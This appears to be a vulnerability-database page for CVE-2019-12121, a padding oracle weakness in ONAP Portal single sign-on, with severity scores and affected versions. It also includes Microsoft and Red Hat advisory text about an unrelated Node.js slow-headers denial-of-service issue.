CVE-2019-12121
published 2020-03-18CVE-2019-12121: An issue was detected in ONAP Portal through Dublin. By executing a padding oracle attack using the ONAPPORTAL/processSingleSignOn UserId field, an attacker is…
PriorityP340high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
0.73%
49.4th percentile
An issue was detected in ONAP Portal through Dublin. By executing a padding oracle attack using the ONAPPORTAL/processSingleSignOn UserId field, an attacker is able to decrypt arbitrary information encrypted with the same symmetric key as UserId. All Portal setups are affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | cm1_nodejs_14.17.2-1_on_cbl_mariner_1.0 | — | — |
| onap | open_network_automation_platform | >= 3.0.0 < 4.0.0 | 4.0.0 |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_msrc7.5HIGH
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2hpg-3rp7-m4h7: An issue was detected in ONAP Portal through Dublin
ghsa_unreviewed·2022-05-24
CVE-2019-12121 [MEDIUM] CWE-311 GHSA-2hpg-3rp7-m4h7: An issue was detected in ONAP Portal through Dublin
An issue was detected in ONAP Portal through Dublin. By executing a padding oracle attack using the ONAPPORTAL/processSingleSignOn UserId field, an attacker is able to decrypt arbitrary information encrypted with the same symmetric key as UserId. All Portal setups are affected.
Microsoft
In Node.js including 6.x before 6.17.0 8.x before 8.15.1 10.x before 10.15.2 and 11.x before 11.10.1 an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep
vendor_msrc·2019-03-12·CVSS 7.5
CVE-2019-5737 [HIGH] CWE-770 In Node.js including 6.x before 6.17.0 8.x before 8.15.1 10.x before 10.15.2 and 11.x before 11.10.1 an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep
In Node.js including 6.x before 6.17.0 8.x before 8.15.1 10.x before 10.15.2 and 11.x before 11.10.1 an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly. This keeps the connection and associated resources alive for a long period of time. Potential attacks are mitigated by the use of a load balancer or other proxy layer. This vulnerability is an extension of CVE-2018-12121 addressed in November and impacts all active Node.js release lines including 6.x before 6.17.0 8.x before 8.15.1 10.x before 10.15.2 and 11.x before 11.10.1.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits
Red Hat
nodejs: Insufficient Slowloris fix causing DoS via server.headersTimeout bypass
vendor_redhat·2019-02-28·CVSS 7.5
CVE-2019-5737 [HIGH] CWE-400 nodejs: Insufficient Slowloris fix causing DoS via server.headersTimeout bypass
nodejs: Insufficient Slowloris fix causing DoS via server.headersTimeout bypass
In Node.js including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1, an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly. This keeps the connection and associated resources alive for a long period of time. Potential attacks are mitigated by the use of a load balancer or other proxy layer. This vulnerability is an extension of CVE-2018-12121, addressed in November and impacts all active Node.js release lines including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1.
It was found that the original fix for Slowloris, CVE-2018-12122, was insufficient.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2020-03-18
Published